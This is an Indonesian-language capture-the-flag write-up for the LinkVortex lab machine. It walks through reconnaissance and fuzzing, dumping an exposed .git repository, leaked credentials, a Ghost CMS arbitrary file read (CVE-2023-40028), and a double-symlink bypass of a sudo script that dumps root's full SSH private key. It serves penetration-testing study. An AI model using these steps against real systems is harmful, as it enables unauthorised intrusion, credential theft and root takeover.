LinkVortex

Information Gathering

Port and Services

# nmap -p- -sSVC 10.10.11.47 --min-rate 1000 -oN nmap_result
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 09:57 EDT
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.80% done; ETC: 09:58 (0:00:11 remaining)
Nmap scan report for 10.10.11.47
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.45 seconds

Subdomain Enumeration

disini saya melakukan enumerasi subdomain dengan melakukan brute force menggunakan fuzz

┌──(kali㉿kali)-[~/ctf/linux/linkvortex]
└─$ ffuf -u http://linkvortex.htb -H "Host: FUZZ.linkvortex.htb" -w /seclist/Discovery/DNS/subdomains-top1million-5000.txt  -t 200  -fs 230
[-- SNIP --]
dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 33ms]
[-- SNIP --]

Directory and Files Scanning

disini saya melakukan directory and files scanning dan mendapatkan folder .git yang cukup menarik

┌──(kali㉿kali)-[~/ctf/linux/linkvortex/dev]
└─$ ffuf -u http://dev.linkvortex.htb/FUZZ -w /seclist/Discovery/Web-Content/raft-large-files.txt -t 200
[--SNIP--]
.git                    [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 44ms]
[--SNIP--]

Initial Access

Git Exposure

disini saya mendapatkan direktori .git yang dapat diakses seperti yang dapat dilihat pada gambar dibawah ini

selanjutnya saya menggunakan git-dumper untuk mendapatkan souce code dari folder .git yang terekspos tersebut

┌──(kali㉿kali)-[~/ctf/linux/linkvortex]
└─$ git-dumper http://dev.linkvortex.htb/ dev
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
[-] Testing http://dev.linkvortex.htb/.git/ [200]
[-] Fetching .git recursively
[-- SNIP --] 
Updated 5596 paths from the index

selanjutnya saya menggunakan perintah git status untuk memeriksa informasi terkini mengenai status working directory dan staging area

┌──(kali㉿kali)-[~/…/linux/linkvortex/dev/ghost]
└─$ git status
Not currently on any branch.
Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   ../Dockerfile.ghost
        modified:   core/test/regression/api/admin/authentication.test.js

disini terdapat 2 file

Dockkerfile.ghost
core/test/regression/api/admin/authentication.test.js

sepertinya mesin ini menggunakan docker untuk aplikasi ghost yang digunakan, selanjutnya saya akan memeriksa kedua file tersebut dengan perintah git diff

┌──(kali㉿kali)-[~/…/linux/linkvortex/dev/ghost]
└─$  git diff --cached ../Dockerfile.ghost
diff --git a/Dockerfile.ghost b/Dockerfile.ghost
new file mode 100644
index 0000000..50864e0
--- /dev/null
+++ b/Dockerfile.ghost
@@ -0,0 +1,16 @@
+FROM ghost:5.58.0
+
+# Copy the config
+COPY config.production.json /var/lib/ghost/config.production.json
+
+# Prevent installing packages
+RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
+
+# Wait for the db to be ready first
+COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
+COPY entry.sh /entry.sh
+RUN chmod +x /var/lib/ghost/wait-for-it.sh
+RUN chmod +x /entry.sh
+
+ENTRYPOINT ["/entry.sh"]
+CMD ["node", "current/index.js"]

┌──(kali㉿kali)-[~/…/linux/linkvortex/dev/ghost]
└─$  git diff --cached core/test/regression/api/admin/authentication.test.js
diff --git a/ghost/core/test/regression/api/admin/authentication.test.js b/ghost/core/test/regression/api/admin/authentication.test.js
index 2735588..e654b0e 100644
--- a/ghost/core/test/regression/api/admin/authentication.test.js
+++ b/ghost/core/test/regression/api/admin/authentication.test.js
@@ -53,7 +53,7 @@ describe('Authentication API', function () {

         it('complete setup', async function () {
             const email = '[email protected]';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';

             const requestMock = nock('https://api.github.com')
                 .get('/repos/tryghost/dawn/zipball')

disini pada file Dockerfile.ghost saya mendapatkan informasi path dari file configuration ghost dan pada file authentication.test.js disini saya mendapatkan password untuk authentication API yang memungkinkan berasal dari user yang terdaftar pada ghost cms. selanjutnya saya akan mencoba login menggunakan credential tersebut

akan tetapi setelah saya mencoba credential tersebut, email tidak terdaftar pada ghost dengan menampilkan error "There is no user with that email address".

pada halaman artikel terdapat informasi penulis yang memungkinkan sebagai username seperti yang dapat dilihat pada gambar dibawah ini

akan tetapi username tersebut masih belum valid, mungkin ini karena domain yang saya gunakan pada email tersebut masih ke example.com, saya berfikir untuk mencoba menggunakan linkvortex.htb sebagai domainnya

pada gambar diatas tersebut menunjukan "Your password is incorrect" yang berarti username tersebut valid, selanjutnya saya menggunakan password yang valid untuk login dan berhasil masuk ke dashboard seperti yang dapat dilihat pada gambar berikut

SSH as bob

pada halaman settings, disini saya menemukan ghost cms tersebut berjalan pada versi 5.58.0

setelah melakukan pencarian exploit, disini saya mendapatkan kerentanan dengan versi yang sesuai CVE-2023-40028 - Ghost CMS Arbitrary File Read

Arbitrary File Read in ghost | CVE-2023-40028 | SnykLearn more about npm with Snyk Open Source Vulnerability Database

GitHub - 0xyassine/CVE-2023-40028GitHub

disini saya melakukan beberapa modifikasi pada script exploit tersebut, pada bagian variable GHOST_URL saya ubah dengan targetnya yaitu http://linkvortex.htb

selanjutnya saya menjalankan exploit tersebut dengan perintah

bash CVE-2023-40028.sh -u "[email protected]" -p "OctopiFociPilfer45"

pada gambar diatas tersebut saya mencoba menjalankannya dengan mencoba membaca file /etc/passwd dan berhasil. disini terdapat user node saya mencoba membaca id_rsa dari user tersebut tapi tidak ditemukan. mengingat sepertinya ghost cms berjalan pada docker container saya mencoba membaca file configurasi /var/lib/ghost/config.production.json (dari hasil git status diatas) dan mendapatkan bob credential

file> /var/lib/ghost/config.production.json
[--SNIP--]
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "[email protected]",
        "pass": "fibber-talented-worth"
        }
      }
    }
[--SNIP--]

Privilege Escalation

disini saya memeriksa daftar perintah yang dapat dijalankan oleh bob dengan menggunakan hak akses sudo

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

disini bob dapat menjalankan sudo pada script berikut

bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

script tersebut akan memindahkan file symlink dengan ketentuan harus menggunakan extensi .png. berikut ini adalah urutan flow simple dari script tersebut

memeriksa apakah file tersebut mengunakan .png extension
jika terdapat etc atau root string pada nama file tersebut ada maka akan dihilangkan dari proses / dibatalkan
jika tidak ada etc atau root string pada nama file tersebut maka akan diproses :
1. memindahkan LINK ke Quarantined directory (/var/quarantined)
2. memeriksa apakah CHECK_CONTENT adalah true, jika true maka akan membaca konten file yang dipindahkan tersebut

dari flow tersebut disini saya dapat menggunakan duoble symlink untuk membaca suatu file, hal ini dilakukan untuk membypass pengecheckan etc atau root string pada file.

target (/root/.ssh/id_rsa) -> link1 (getrsa ) -> link2 (getrsa.png)

saat pertama kali membuat symlink (link1) akan link tersebut akan menuju /root/.ssh/id_rsa, script akan mendeteksi kata "etc" atau "root" dengan menggunakan /usr/bin/readlink

dengan membuat symlink baru yang mengarah pada link sebelumnya akan membuat kata "etc" atau "root" terganti dengan nama link sebelumnya

dengan cara ini dapat membypass bagian pengecheckan if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)'pada script tersebut. berikut ini adalah stepnya

bob@linkvortex:~$ ln -s /root/.ssh/id_rsa getrsa
bob@linkvortex:~$ ln -s /home/bob/getrsa getrsa.png
bob@linkvortex:~$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh getrsa.png 
Link found [ getrsa.png ] , moving it to quarantine
Content:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
bob@linkvortex:~$

disini saya berhasil mendapatkan id_rsa dari root, selanjutnya saya akan menggunakannya untuk terhubung ke ssh sebagai root

┌──(kali㉿kali)-[~/ctf/linux/linkvortex]
└─$ nano id_rsa                                 
                                                                                                                                           
┌──(kali㉿kali)-[~/ctf/linux/linkvortex]
└─$ chmod 600 id_rsa 
                                                                                                                                           
┌──(kali㉿kali)-[~/ctf/linux/linkvortex]
└─$ ssh -i id_rsa [email protected]
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Dec  2 11:20:43 2024 from 10.10.14.61
root@linkvortex:~# cat root.txt 
94180e252443c3fxxxxxxxxxxxxxxxxx
root@linkvortex:~#

dan disini telah berhasil privilege escalation ke root.

PreviousEasy NextEditorial

Last updated 7 months ago